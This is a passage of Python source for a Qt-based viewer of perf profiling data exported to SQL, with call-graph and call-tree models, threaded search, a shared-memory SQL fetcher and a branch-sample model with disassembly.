self.pattern.setChecked(data)
self.Find(0)
def NextPrev(self, direction):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
if value != self.last_value:
index = self.textbox.findText(value)
# Allow for a button press before the value has been added to the combo box
if index < 0:
index = self.textbox.count()
self.textbox.addItem(value, pattern)
self.textbox.setCurrentIndex(index)
return
else:
self.textbox.setItemData(index, pattern)
elif pattern != self.last_pattern:
# Keep the pattern recorded in the combo box up to date
index = self.textbox.currentIndex()
self.textbox.setItemData(index, pattern)
self.Find(direction)
def NotFound(self):
QMessageBox.information(self.bar, "Find", "'" + self.textbox.currentText() + "' not found")
# Context-sensitive call graph data model item base
class CallGraphLevelItemBase(object):
def __init__(self, glb, row, parent_item):
self.glb = glb
self.row = row
self.parent_item = parent_item
self.query_done = False
self.child_count = 0
self.child_items = []
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def childCount(self):
if not self.query_done:
self.Select()
if not self.child_count:
return -1
return self.child_count
def hasChildren(self):
if not self.query_done:
return True
return self.child_count > 0
def getData(self, column):
return self.data[column]
# Context-sensitive call graph data model level 2+ item base
class CallGraphLevelTwoPlusItemBase(CallGraphLevelItemBase):
def __init__(self, glb, row, comm_id, thread_id, call_path_id, time, branch_count, parent_item):
super(CallGraphLevelTwoPlusItemBase, self).__init__(glb, row, parent_item)
self.comm_id = comm_id
self.thread_id = thread_id
self.call_path_id = call_path_id
self.branch_count = branch_count
self.time = time
def Select(self):
self.query_done = True
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT call_path_id, name, short_name, COUNT(calls.id), SUM(return_time - call_time), SUM(branch_count)"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" WHERE parent_call_path_id = " + str(self.call_path_id) +
" AND comm_id = " + str(self.comm_id) +
" AND thread_id = " + str(self.thread_id) +
" GROUP BY call_path_id, name, short_name"
" ORDER BY call_path_id")
while query.next():
child_item = CallGraphLevelThreeItem(self.glb, self.child_count, self.comm_id, self.thread_id, query.value(0), query.value(1), query.value(2), query.value(3), int(query.value(4)), int(query.value(5)), self)
self.child_items.append(child_item)
self.child_count += 1
# Context-sensitive call graph data model level three item
class CallGraphLevelThreeItem(CallGraphLevelTwoPlusItemBase):
def __init__(self, glb, row, comm_id, thread_id, call_path_id, name, dso, count, time, branch_count, parent_item):
super(CallGraphLevelThreeItem, self).__init__(glb, row, comm_id, thread_id, call_path_id, time, branch_count, parent_item)
dso = dsoname(dso)
self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(branch_count), PercentToOneDP(branch_count, parent_item.branch_count) ]
self.dbid = call_path_id
# Context-sensitive call graph data model level two item
class CallGraphLevelTwoItem(CallGraphLevelTwoPlusItemBase):
def __init__(self, glb, row, comm_id, thread_id, pid, tid, parent_item):
super(CallGraphLevelTwoItem, self).__init__(glb, row, comm_id, thread_id, 1, 0, 0, parent_item)
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", ""]
self.dbid = thread_id
def Select(self):
super(CallGraphLevelTwoItem, self).Select()
for child_item in self.child_items:
self.time += child_item.time
self.branch_count += child_item.branch_count
for child_item in self.child_items:
child_item.data[4] = PercentToOneDP(child_item.time, self.time)
child_item.data[6] = PercentToOneDP(child_item.branch_count, self.branch_count)
# Context-sensitive call graph data model level one item
class CallGraphLevelOneItem(CallGraphLevelItemBase):
def __init__(self, glb, row, comm_id, comm, parent_item):
super(CallGraphLevelOneItem, self).__init__(glb, row, parent_item)
self.data = [comm, "", "", "", "", "", ""]
self.dbid = comm_id
def Select(self):
self.query_done = True
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT thread_id, pid, tid"
" FROM comm_threads"
" INNER JOIN threads ON thread_id = threads.id"
" WHERE comm_id = " + str(self.dbid))
while query.next():
child_item = CallGraphLevelTwoItem(self.glb, self.child_count, self.dbid, query.value(0), query.value(1), query.value(2), self)
self.child_items.append(child_item)
self.child_count += 1
# Context-sensitive call graph data model root item
class CallGraphRootItem(CallGraphLevelItemBase):
def __init__(self, glb):
super(CallGraphRootItem, self).__init__(glb, 0, None)
self.dbid = 0
self.query_done = True
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, comm FROM comms")
while query.next():
if not query.value(0):
continue
child_item = CallGraphLevelOneItem(glb, self.child_count, query.value(0), query.value(1), self)
self.child_items.append(child_item)
self.child_count += 1
# Context-sensitive call graph data model base
class CallGraphModelBase(TreeModel):
def __init__(self, glb, parent=None):
super(CallGraphModelBase, self).__init__(glb, parent)
def FindSelect(self, value, pattern, query):
if pattern:
# postgresql and sqlite pattern matching differences:
# postgresql LIKE is case sensitive but sqlite LIKE is not
# postgresql LIKE allows % and _ to be escaped with \ but sqlite LIKE does not
# postgresql supports ILIKE which is case insensitive
# sqlite supports GLOB (text only) which uses * and ? and is case sensitive
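# For example, with the LIKE translation below the user pattern "main*"
# becomes " LIKE 'main%'", while sqlite uses it directly as " GLOB 'main*'"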
if not self.glb.dbref.is_sqlite3:
# Escape % and _
s = value.replace("%", "\\%")
s = s.replace("_", "\\_")
# Translate * and ? into SQL LIKE pattern characters % and _
# (str.maketrans on Python 3, where string.maketrans no longer exists)
trans = str.maketrans("*?", "%_") if sys.version_info[0] == 3 else string.maketrans("*?", "%_")
match = " LIKE '" + str(s).translate(trans) + "'"
else:
match = " GLOB '" + str(value) + "'"
else:
match = " = '" + str(value) + "'"
self.DoFindSelect(query, match)
def Found(self, query, found):
if found:
return self.FindPath(query)
return []
def FindValue(self, value, pattern, query, last_value, last_pattern):
if last_value == value and pattern == last_pattern:
found = query.first()
else:
self.FindSelect(value, pattern, query)
found = query.next()
return self.Found(query, found)
def FindNext(self, query):
found = query.next()
if not found:
found = query.first()
return self.Found(query, found)
def FindPrev(self, query):
found = query.previous()
if not found:
found = query.last()
return self.Found(query, found)
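# Note: FindNext and FindPrev above wrap around to the first or last match
# when they run off the end of the query results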
def FindThread(self, c):
if c.direction == 0 or c.value != c.last_value or c.pattern != c.last_pattern:
ids = self.FindValue(c.value, c.pattern, c.query, c.last_value, c.last_pattern)
elif c.direction > 0:
ids = self.FindNext(c.query)
else:
ids = self.FindPrev(c.query)
return (True, ids)
def Find(self, value, direction, pattern, context, callback):
class Context():
def __init__(self, *x):
self.value, self.direction, self.pattern, self.query, self.last_value, self.last_pattern = x
def Update(self, *x):
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = x + (self.value, self.pattern)
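# Update() reuses the existing query and shifts the current value and
# pattern into last_value and last_pattern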
if len(context):
context[0].Update(value, direction, pattern)
else:
context.append(Context(value, direction, pattern, QSqlQuery(self.glb.db), None, None))
# Use a thread so the UI is not blocked during the SELECT
thread = Thread(self.FindThread, context[0])
thread.done.connect(lambda ids, t=thread, c=callback: self.FindDone(t, c, ids), Qt.QueuedConnection)
thread.start()
def FindDone(self, thread, callback, ids):
callback(ids)
# Context-sensitive call graph data model
class CallGraphModel(CallGraphModelBase):
def __init__(self, glb, parent=None):
super(CallGraphModel, self).__init__(glb, parent)
def GetRoot(self):
return CallGraphRootItem(self.glb)
def columnCount(self, parent=None):
return 7
def columnHeader(self, column):
headers = ["Call Path", "Object", "Count ", "Time (ns) ", "Time (%) ", "Branch Count ", "Branch Count (%) "]
return headers[column]
def columnAlignment(self, column):
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
return alignment[column]
def DoFindSelect(self, query, match):
QueryExec(query, "SELECT call_path_id, comm_id, thread_id"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" WHERE symbols.name" + match +
" GROUP BY comm_id, thread_id, call_path_id"
" ORDER BY comm_id, thread_id, call_path_id")
def FindPath(self, query):
# Turn the query result into a list of ids that the tree view can walk
# to open the tree at the right place.
ids = []
parent_id = query.value(0)
while parent_id:
ids.insert(0, parent_id)
q2 = QSqlQuery(self.glb.db)
QueryExec(q2, "SELECT parent_id"
" FROM call_paths"
" WHERE id = " + str(parent_id))
if not q2.next():
break
parent_id = q2.value(0)
# The call path root is not used
if ids[0] == 1:
del ids[0]
ids.insert(0, query.value(2))
ids.insert(0, query.value(1))
return ids
# Call tree data model level 2+ item base
class CallTreeLevelTwoPlusItemBase(CallGraphLevelItemBase):
def __init__(self, glb, row, comm_id, thread_id, calls_id, time, branch_count, parent_item):
super(CallTreeLevelTwoPlusItemBase, self).__init__(glb, row, parent_item)
self.comm_id = comm_id
self.thread_id = thread_id
self.calls_id = calls_id
self.branch_count = branch_count
self.time = time
def Select(self):
self.query_done = True
if self.calls_id == 0:
comm_thread = " AND comm_id = " + str(self.comm_id) + " AND thread_id = " + str(self.thread_id)
else:
comm_thread = ""
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT calls.id, name, short_name, call_time, return_time - call_time, branch_count"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" WHERE calls.parent_id = " + str(self.calls_id) + comm_thread +
" ORDER BY call_time, calls.id")
while query.next():
child_item = CallTreeLevelThreeItem(self.glb, self.child_count, self.comm_id, self.thread_id, query.value(0), query.value(1), query.value(2), query.value(3), int(query.value(4)), int(query.value(5)), self)
self.child_items.append(child_item)
self.child_count += 1
# Call tree data model level three item
class CallTreeLevelThreeItem(CallTreeLevelTwoPlusItemBase):
def __init__(self, glb, row, comm_id, thread_id, calls_id, name, dso, count, time, branch_count, parent_item):
super(CallTreeLevelThreeItem, self).__init__(glb, row, comm_id, thread_id, calls_id, time, branch_count, parent_item)
dso = dsoname(dso)
self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(branch_count), PercentToOneDP(branch_count, parent_item.branch_count) ]
self.dbid = calls_id
# Call tree data model level two item
class CallTreeLevelTwoItem(CallTreeLevelTwoPlusItemBase):
def __init__(self, glb, row, comm_id, thread_id, pid, tid, parent_item):
super(CallTreeLevelTwoItem, self).__init__(glb, row, comm_id, thread_id, 0, 0, 0, parent_item)
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", ""]
self.dbid = thread_id
def Select(self):
super(CallTreeLevelTwoItem, self).Select()
for child_item in self.child_items:
self.time += child_item.time
self.branch_count += child_item.branch_count
for child_item in self.child_items:
child_item.data[4] = PercentToOneDP(child_item.time, self.time)
child_item.data[6] = PercentToOneDP(child_item.branch_count, self.branch_count)
# Call tree data model level one item
class CallTreeLevelOneItem(CallGraphLevelItemBase):
def __init__(self, glb, row, comm_id, comm, parent_item):
super(CallTreeLevelOneItem, self).__init__(glb, row, parent_item)
self.data = [comm, "", "", "", "", "", ""]
self.dbid = comm_id
def Select(self):
self.query_done = True
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT thread_id, pid, tid"
" FROM comm_threads"
" INNER JOIN threads ON thread_id = threads.id"
" WHERE comm_id = " + str(self.dbid))
while query.next():
child_item = CallTreeLevelTwoItem(self.glb, self.child_count, self.dbid, query.value(0), query.value(1), query.value(2), self)
self.child_items.append(child_item)
self.child_count += 1
# Call tree data model root item
class CallTreeRootItem(CallGraphLevelItemBase):
def __init__(self, glb):
super(CallTreeRootItem, self).__init__(glb, 0, None)
self.dbid = 0
self.query_done = True
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, comm FROM comms")
while query.next():
if not query.value(0):
continue
child_item = CallTreeLevelOneItem(glb, self.child_count, query.value(0), query.value(1), self)
self.child_items.append(child_item)
self.child_count += 1
# Call Tree data model
class CallTreeModel(CallGraphModelBase):
def __init__(self, glb, parent=None):
super(CallTreeModel, self).__init__(glb, parent)
def GetRoot(self):
return CallTreeRootItem(self.glb)
def columnCount(self, parent=None):
return 7
def columnHeader(self, column):
headers = ["Call Path", "Object", "Call Time", "Time (ns) ", "Time (%) ", "Branch Count ", "Branch Count (%) "]
return headers[column]
def columnAlignment(self, column):
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
return alignment[column]
def DoFindSelect(self, query, match):
QueryExec(query, "SELECT calls.id, comm_id, thread_id"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" WHERE symbols.name" + match +
" ORDER BY comm_id, thread_id, call_time, calls.id")
def FindPath(self, query):
# Turn the query result into a list of ids that the tree view can walk
# to open the tree at the right place.
ids = []
parent_id = query.value(0)
while parent_id:
ids.insert(0, parent_id)
q2 = QSqlQuery(self.glb.db)
QueryExec(q2, "SELECT parent_id"
" FROM calls"
" WHERE id = " + str(parent_id))
if not q2.next():
break
parent_id = q2.value(0)
ids.insert(0, query.value(2))
ids.insert(0, query.value(1))
return ids
# Vertical widget layout
class VBox():
def __init__(self, w1, w2, w3=None):
self.vbox = QWidget()
self.vbox.setLayout(QVBoxLayout())
self.vbox.layout().setContentsMargins(0, 0, 0, 0)
self.vbox.layout().addWidget(w1)
self.vbox.layout().addWidget(w2)
if w3:
self.vbox.layout().addWidget(w3)
def Widget(self):
return self.vbox
# Tree window base
class TreeWindowBase(QMdiSubWindow):
def __init__(self, parent=None):
super(TreeWindowBase, self).__init__(parent)
self.model = None
self.view = None
self.find_bar = None
def DisplayFound(self, ids):
if not len(ids):
return False
parent = QModelIndex()
for dbid in ids:
found = False
n = self.model.rowCount(parent)
for row in xrange(n):
child = self.model.index(row, 0, parent)
if child.internalPointer().dbid == dbid:
found = True
self.view.setCurrentIndex(child)
parent = child
break
if not found:
break
return found
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.model.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, ids):
found = True
if not self.DisplayFound(ids):
found = False
self.find_bar.Idle()
if not found:
self.find_bar.NotFound()
# Context-sensitive call graph window
class CallGraphWindow(TreeWindowBase):
def __init__(self, glb, parent=None):
super(CallGraphWindow, self).__init__(parent)
self.model = LookupCreateModel("Context-Sensitive Call Graph", lambda x=glb: CallGraphModel(x))
self.view = QTreeView()
self.view.setModel(self.model)
for c, w in ((0, 250), (1, 100), (2, 60), (3, 70), (4, 70), (5, 100)):
self.view.setColumnWidth(c, w)
self.find_bar = FindBar(self, self)
self.vbox = VBox(self.view, self.find_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, "Context-Sensitive Call Graph")
# Call tree window
class CallTreeWindow(TreeWindowBase):
def __init__(self, glb, parent=None):
super(CallTreeWindow, self).__init__(parent)
self.model = LookupCreateModel("Call Tree", lambda x=glb: CallTreeModel(x))
self.view = QTreeView()
self.view.setModel(self.model)
for c, w in ((0, 230), (1, 100), (2, 100), (3, 70), (4, 70), (5, 100)):
self.view.setColumnWidth(c, w)
self.find_bar = FindBar(self, self)
self.vbox = VBox(self.view, self.find_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, "Call Tree")
# Child data item finder
class ChildDataItemFinder():
def __init__(self, root):
self.root = root
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = (None,) * 5
self.rows = []
self.pos = 0
def FindSelect(self):
self.rows = []
if self.pattern:
pattern = re.compile(self.value)
for child in self.root.child_items:
for column_data in child.data:
if re.search(pattern, str(column_data)) is not None:
self.rows.append(child.row)
break
else:
for child in self.root.child_items:
for column_data in child.data:
if self.value in str(column_data):
self.rows.append(child.row)
break
def FindValue(self):
self.pos = 0
if self.last_value != self.value or self.pattern != self.last_pattern:
self.FindSelect()
if not len(self.rows):
return -1
return self.rows[self.pos]
def FindThread(self):
if self.direction == 0 or self.value != self.last_value or self.pattern != self.last_pattern:
row = self.FindValue()
elif len(self.rows):
if self.direction > 0:
self.pos += 1
if self.pos >= len(self.rows):
self.pos = 0
else:
self.pos -= 1
if self.pos < 0:
self.pos = len(self.rows) - 1
row = self.rows[self.pos]
else:
row = -1
return (True, row)
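# A row of -1 is passed through FindDone() to the window, which then
# reports 'not found'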
def Find(self, value, direction, pattern, context, callback):
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = (value, direction, pattern, self.value, self.pattern)
# Use a thread so the UI is not blocked
thread = Thread(self.FindThread)
thread.done.connect(lambda row, t=thread, c=callback: self.FindDone(t, c, row), Qt.QueuedConnection)
thread.start()
def FindDone(self, thread, callback, row):
callback(row)
# Number of database records to fetch in one go
glb_chunk_sz = 10000
# Size of a pickled integer big enough for glb_chunk_sz
glb_nsz = 8
# Background process for SQL data fetcher
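# The fetcher runs in a separate process and passes records to the parent
# through a shared-memory ring buffer: each record is written as a pickled
# length (glb_nsz bytes) followed by the pickled data, 'head' and 'tail'
# hold the producer and consumer positions, and a pickled zero length marks
# an early wrap back to the start of the buffer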
class SQLFetcherProcess():
def __init__(self, dbref, sql, buffer, head, tail, fetch_count, fetching_done, process_target, wait_event, fetched_event, prep):
# Need a unique connection name
conn_name = "SQLFetcher" + str(os.getpid())
self.db, dbname = dbref.Open(conn_name)
self.sql = sql
self.buffer = buffer
self.head = head
self.tail = tail
self.fetch_count = fetch_count
self.fetching_done = fetching_done
self.process_target = process_target
self.wait_event = wait_event
self.fetched_event = fetched_event
self.prep = prep
self.query = QSqlQuery(self.db)
self.query_limit = 0 if "$$last_id$$" in sql else 2
self.last_id = -1
self.fetched = 0
self.more = True
self.local_head = self.head.value
self.local_tail = self.tail.value
def Select(self):
if self.query_limit:
if self.query_limit == 1:
return
self.query_limit -= 1
stmt = self.sql.replace("$$last_id$$", str(self.last_id))
QueryExec(self.query, stmt)
def Next(self):
if not self.query.next():
self.Select()
if not self.query.next():
return None
self.last_id = self.query.value(0)
return self.prep(self.query)
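# Note: Select() substitutes the last fetched id for $$last_id$$, so each
# LIMITed query continues from where the previous chunk ended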
def WaitForTarget(self):
while True:
self.wait_event.clear()
target = self.process_target.value
if target > self.fetched or target < 0:
break
self.wait_event.wait()
return target
def HasSpace(self, sz):
if self.local_tail <= self.local_head:
space = len(self.buffer) - self.local_head
if space > sz:
return True
if space >= glb_nsz:
# Write a pickled 0 (or leave space < glb_nsz) to mean there is no more data at the top of the buffer
nd = pickle.dumps(0, pickle.HIGHEST_PROTOCOL)
self.buffer[self.local_head : self.local_head + len(nd)] = nd
self.local_head = 0
if self.local_tail - self.local_head > sz:
return True
return False
def WaitForSpace(self, sz):
if self.HasSpace(sz):
return
while True:
self.wait_event.clear()
self.local_tail = self.tail.value
if self.HasSpace(sz):
return
self.wait_event.wait()
def AddToBuffer(self, obj):
d = pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)
n = len(d)
nd = pickle.dumps(n, pickle.HIGHEST_PROTOCOL)
sz = n + glb_nsz
self.WaitForSpace(sz)
pos = self.local_head
self.buffer[pos : pos + len(nd)] = nd
self.buffer[pos + glb_nsz : pos + sz] = d
self.local_head += sz
def FetchBatch(self, batch_size):
fetched = 0
while batch_size > fetched:
obj = self.Next()
if obj is None:
self.more = False
break
self.AddToBuffer(obj)
fetched += 1
if fetched:
self.fetched += fetched
with self.fetch_count.get_lock():
self.fetch_count.value += fetched
self.head.value = self.local_head
self.fetched_event.set()
def Run(self):
while self.more:
target = self.WaitForTarget()
if target < 0:
break
batch_size = min(glb_chunk_sz, target - self.fetched)
self.FetchBatch(batch_size)
self.fetching_done.value = True
self.fetched_event.set()
def SQLFetcherFn(*x):
process = SQLFetcherProcess(*x)
process.Run()
# SQL data fetcher
class SQLFetcher(QObject):
done = Signal(object)
def __init__(self, glb, sql, prep, process_data, parent=None):
super(SQLFetcher, self).__init__(parent)
self.process_data = process_data
self.more = True
self.target = 0
self.last_target = 0
self.fetched = 0
self.buffer_size = 16 * 1024 * 1024
self.buffer = Array(c_char, self.buffer_size, lock=False)
self.head = Value(c_longlong)
self.tail = Value(c_longlong)
self.local_tail = 0
self.fetch_count = Value(c_longlong)
self.fetching_done = Value(c_bool)
self.last_count = 0
self.process_target = Value(c_longlong)
self.wait_event = Event()
self.fetched_event = Event()
glb.AddInstanceToShutdownOnExit(self)
self.process = Process(target=SQLFetcherFn, args=(glb.dbref, sql, self.buffer, self.head, self.tail, self.fetch_count, self.fetching_done, self.process_target, self.wait_event, self.fetched_event, prep))
self.process.start()
self.thread = Thread(self.Thread)
self.thread.done.connect(self.ProcessData, Qt.QueuedConnection)
self.thread.start()
def Shutdown(self):
# Tell the thread and process to exit
self.process_target.value = -1
self.wait_event.set()
self.more = False
self.fetching_done.value = True
self.fetched_event.set()
def Thread(self):
if not self.more:
return True, 0
while True:
self.fetched_event.clear()
fetch_count = self.fetch_count.value
if fetch_count != self.last_count:
break
if self.fetching_done.value:
self.more = False
return True, 0
self.fetched_event.wait()
count = fetch_count - self.last_count
self.last_count = fetch_count
self.fetched += count
return False, count
def Fetch(self, nr):
if not self.more:
# -1 indicates there are no more
return -1
result = self.fetched
extra = result + nr - self.target
if extra > 0:
self.target += extra
# process_target < 0 indicates shutting down
if self.process_target.value >= 0:
self.process_target.value = self.target
self.wait_event.set()
return result
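# Fetch() returns the number of records already fetched, and raises the
# target if necessary so that the background process fetches more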
def RemoveFromBuffer(self):
pos = self.local_tail
if len(self.buffer) - pos < glb_nsz:
pos = 0
n = pickle.loads(self.buffer[pos : pos + glb_nsz])
if n == 0:
pos = 0
n = pickle.loads(self.buffer[0 : glb_nsz])
pos += glb_nsz
obj = pickle.loads(self.buffer[pos : pos + n])
self.local_tail = pos + n
return obj
def ProcessData(self, count):
for i in xrange(count):
obj = self.RemoveFromBuffer()
self.process_data(obj)
self.tail.value = self.local_tail
self.wait_event.set()
self.done.emit(count)
# Fetch more records bar
class FetchMoreRecordsBar():
def __init__(self, model, parent):
self.model = model
self.label = QLabel("Number of records (x " + "{:,}".format(glb_chunk_sz) + ") to fetch:")
self.label.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch_count = QSpinBox()
self.fetch_count.setRange(1, 1000000)
self.fetch_count.setValue(10)
self.fetch_count.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch = QPushButton("Go!")
self.fetch.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch.released.connect(self.FetchMoreRecords)
self.progress = QProgressBar()
self.progress.setRange(0, 100)
self.progress.hide()
self.done_label = QLabel("All records fetched")
self.done_label.hide()
self.spacer = QLabel("")
self.close_button = QToolButton()
self.close_button.setIcon(parent.style().standardIcon(QStyle.SP_DockWidgetCloseButton))
self.close_button.released.connect(self.Deactivate)
self.hbox = QHBoxLayout()
self.hbox.setContentsMargins(0, 0, 0, 0)
self.hbox.addWidget(self.label)
self.hbox.addWidget(self.fetch_count)
self.hbox.addWidget(self.fetch)
self.hbox.addWidget(self.spacer)
self.hbox.addWidget(self.progress)
self.hbox.addWidget(self.done_label)
self.hbox.addWidget(self.close_button)
self.bar = QWidget()
self.bar.setLayout(self.hbox)
self.bar.show()
self.in_progress = False
self.model.progress.connect(self.Progress)
self.done = False
if not model.HasMoreRecords():
self.Done()
def Widget(self):
return self.bar
def Activate(self):
self.bar.show()
self.fetch.setFocus()
def Deactivate(self):
self.bar.hide()
def Enable(self, enable):
self.fetch.setEnabled(enable)
self.fetch_count.setEnabled(enable)
def Busy(self):
self.Enable(False)
self.fetch.hide()
self.spacer.hide()
self.progress.show()
def Idle(self):
self.in_progress = False
self.Enable(True)
self.progress.hide()
self.fetch.show()
self.spacer.show()
def Target(self):
return self.fetch_count.value() * glb_chunk_sz
def Done(self):
self.done = True
self.Idle()
self.label.hide()
self.fetch_count.hide()
self.fetch.hide()
self.spacer.hide()
self.done_label.show()
def Progress(self, count):
if self.in_progress:
if count:
# Use integer division so that setValue() gets an int on Python 3 too
percent = ((count - self.start) * 100) // self.Target()
if percent >= 100:
self.Idle()
else:
self.progress.setValue(percent)
if not count:
# Count value of zero means no more records
self.Done()
def FetchMoreRecords(self):
if self.done:
return
self.progress.setValue(0)
self.Busy()
self.in_progress = True
self.start = self.model.FetchMoreRecords(self.Target())
# Branch data model level two item
class BranchLevelTwoItem():
def __init__(self, row, text, parent_item):
self.row = row
self.parent_item = parent_item
self.data = [""] * 8
self.data[7] = text
self.level = 2
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def childCount(self):
return 0
def hasChildren(self):
return False
def getData(self, column):
return self.data[column]
# Branch data model level one item
class BranchLevelOneItem():
def __init__(self, glb, row, data, parent_item):
self.glb = glb
self.row = row
self.parent_item = parent_item
self.child_count = 0
self.child_items = []
self.data = data[1:]
self.dbid = data[0]
self.level = 1
self.query_done = False
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def Select(self):
self.query_done = True
if not self.glb.have_disassembler:
return
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT cpu, to_dso_id, to_symbol_id, to_sym_offset, short_name, long_name, build_id, sym_start, to_ip"
" FROM samples"
" INNER JOIN dsos ON samples.to_dso_id = dsos.id"
" INNER JOIN symbols ON samples.to_symbol_id = symbols.id"
" WHERE samples.id = " + str(self.dbid))
if not query.next():
return
cpu = query.value(0)
dso = query.value(1)
sym = query.value(2)
if dso == 0 or sym == 0:
return
off = query.value(3)
short_name = query.value(4)
long_name = query.value(5)
build_id = query.value(6)
sym_start = query.value(7)
ip = query.value(8)
QueryExec(query, "SELECT samples.dso_id, symbol_id, sym_offset, sym_start"
" FROM samples"
" INNER JOIN symbols ON samples.symbol_id = symbols.id"
" WHERE samples.id > " + str(self.dbid) + " AND cpu = " + str(cpu) +
" ORDER BY samples.id"
" LIMIT 1")
if not query.next():
return
if query.value(0) != dso:
# Cannot disassemble from one dso to another
return
bsym = query.value(1)
boff = query.value(2)
bsym_start = query.value(3)
if bsym == 0:
return
tot = bsym_start + boff + 1 - sym_start - off
if tot <= 0 or tot > 16384:
return
inst = self.glb.disassembler.Instruction()
f = self.glb.FileFromNamesAndBuildId(short_name, long_name, build_id)
if not f:
return
mode = 0 if Is64Bit(f) else 1
self.glb.disassembler.SetMode(inst, mode)
buf_sz = tot + 16
buf = create_string_buffer(buf_sz)
f.seek(sym_start + off)
buf.value = f.read(buf_sz)
buf_ptr = addressof(buf)
i = 0
while tot > 0:
cnt, text = self.glb.disassembler.DisassembleOne(inst, buf_ptr, buf_sz, ip)
if cnt:
byte_str = tohex(ip).rjust(16)
for k in xrange(cnt):
byte_str += " %02x" % ord(buf[i])
i += 1
while k < 15:
byte_str += " "
k += 1
self.child_items.append(BranchLevelTwoItem(0, byte_str + " " + text, self))
self.child_count += 1
else:
return
buf_ptr += cnt
tot -= cnt
buf_sz -= cnt
ip += cnt
def childCount(self):
if not self.query_done:
self.Select()
if not self.child_count:
return -1
return self.child_count
def hasChildren(self):
if not self.query_done:
return True
return self.child_count > 0
def getData(self, column):
return self.data[column]
# Branch data model root item
class BranchRootItem():
def __init__(self):
self.child_count = 0
self.child_items = []
self.level = 0
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return None
def getRow(self):
return 0
def childCount(self):
return self.child_count
def hasChildren(self):
return self.child_count > 0
def getData(self, column):
return ""
# Branch data preparation
def BranchDataPrep(query):
data = []
for i in xrange(0, 8):
data.append(query.value(i))
data.append(tohex(query.value(8)).rjust(16) + " " + query.value(9) + offstr(query.value(10)) +
" (" + dsoname(query.value(11)) + ")" + " -> " +
tohex(query.value(12)) + " " + query.value(13) + offstr(query.value(14)) +
" (" + dsoname(query.value(15)) + ")")
return data
def BranchDataPrepWA(query):
data = []
data.append(query.value(0))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(1)))
for i in xrange(2, 8):
data.append(query.value(i))
data.append(tohex(query.value(8)).rjust(16) + " " + query.value(9) + offstr(query.value(10)) +
" (" + dsoname(query.value(11)) + ")" + " -> " +
tohex(query.value(12)) + " " + query.value(13) + offstr(query.value(14)) +
" (" + dsoname(query.value(15)) + ")")
return data
# Branch data model
class BranchModel(TreeModel):
progress = Signal(object)
def __init__(self, glb, event_id, where_clause, parent=None):
super(BranchModel, self).__init__(glb, parent)
self.event_id = event_id
self.more = True
self.populated = 0
sql = ("SELECT samples.id, time, cpu, comm, pid, tid, branch_types.name,"
" CASE WHEN in_tx = '0' THEN 'No' ELSE 'Yes' END,"
" ip, symbols.name, sym_offset, dsos.short_name,"
" to_ip, to_symbols.name, to_sym_offset, to_dsos.short_name"
" FROM samples"
" INNER JOIN comms ON comm_id = comms.id"
" INNER JOIN threads ON thread_id = threads.id"
" INNER JOIN branch_types ON branch_type = branch_types.id"
" INNER JOIN symbols ON symbol_id = symbols.id"
" INNER JOIN symbols to_symbols ON to_symbol_id = to_symbols.id"
" INNER JOIN dsos ON samples.dso_id = dsos.id"
" INNER JOIN dsos AS to_dsos ON samples.to_dso_id = to_dsos.id"
" WHERE samples.id > $$last_id$$" + where_clause +
" AND evsel_id = " + str(self.event_id) +
" ORDER BY samples.id"
" LIMIT " + str(glb_chunk_sz))
if pyside_version_1 and sys.version_info[0] == 3:
prep = BranchDataPrepWA
else:
prep = BranchDataPrep
self.fetcher = SQLFetcher(glb, sql, prep, self.AddSample)
self.fetcher.done.connect(self.Update)
self.fetcher.Fetch(glb_chunk_sz)
def GetRoot(self):
return BranchRootItem()
def columnCount(self, parent=None):
return 8
def columnHeader(self, column):
return ("Time", "CPU", "Command", "PID", "TID", "Branch Type", "In Tx", "Branch")[column]
def columnFont(self, column):
if column != 7:
return None
return QFont("Monospace")
